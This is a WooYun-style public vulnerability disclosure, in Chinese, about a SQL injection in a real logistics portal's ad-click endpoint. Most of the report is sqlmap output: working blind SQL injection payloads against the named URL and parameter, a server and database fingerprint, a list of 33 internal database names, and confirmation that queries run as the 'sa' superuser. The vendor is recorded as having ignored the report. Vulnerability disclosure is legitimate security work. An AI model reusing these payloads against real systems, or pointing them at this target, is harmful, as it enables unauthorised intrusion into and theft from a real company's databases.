乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开
国内最著名的物流综合门户网站,根据世界权威检测网站Alexa.com的访问量排名统计,锦程物流网在国内物流行业网站中连续十年排名第一。 目前,锦程物流网已经成为汇聚全球物流提供商资源、贸易商资源以及行业相关资源的最大的行业资源集中地。已拥有近百万的企业用户,数十万物流提供商和行业相关者,每天均有上万家的物流供需双方企业发布供应、运价、招标、代理等重要信息。符合行业特色的专业物流分类板块使得各类物流提供商均能在网站上找到属于自己的精准营销空间。同时,专业细致的分类也便于贸易客户更加便捷的检索到所需信息。
受影响站点
注入点
http://adnew.adimg.jctrans.com/ADClick.aspx?id=12117&tp=0&url=/CQmVplXX+MKvQ7ZSxYvYHUZtsw3ae+gIOLb9Ej4agVfyVVT4JN+e/d2yjVnMN05
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: url (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: id=12117&tp=0&url=/CQmVplXX MKvQ7ZSxYvYHUZtsw3ae gIOLb9Ej4agVfyVVT4JN e/d2yjVnMN05%00');IF(2856=2856) SELECT 2856 ELSE DROP FUNCTION eDum-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) Payload: id=12117&tp=0&url=/CQmVplXX MKvQ7ZSxYvYHUZtsw3ae gIOLb9Ej4agVfyVVT4JN e/d2yjVnMN05%00') OR 9097=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012available databases [33]:[*] [info.jinlian.cn][*] [jinlianbank.com][*] [jlgroup.com.cn][*] AUTOBuide_site[*] distrib@tion[*] FFC[*] gbcnews[*] HRBase[*] HuiZe[*] jcAction[*] JcBusinessSystem[*] JcBussiness[*] jcNet[*] jcstat[*] jctradenew[*] JinLing[*] JinYang[*] JLWebSite[*] jlworld[*] LogisticsProducts[*] LogisticsSystem_Census[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] ServiceEvaluation[*] siteCMS[*] siteCMStest[*] tempdb[*] test01[*] test2[*] TurboCMSsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: url (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: id=12117&tp=0&url=/CQmVplXX MKvQ7ZSxYvYHUZtsw3ae gIOLb9Ej4agVfyVVT4JN e/d2yjVnMN05%00');IF(2856=2856) SELECT 2856 ELSE DROP FUNCTION eDum-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) Payload: id=12117&tp=0&url=/CQmVplXX MKvQ7ZSxYvYHUZtsw3ae gIOLb9Ej4agVfyVVT4JN e/d2yjVnMN05%00') OR 9097=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012current user: 'sa'
如上
- -
未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)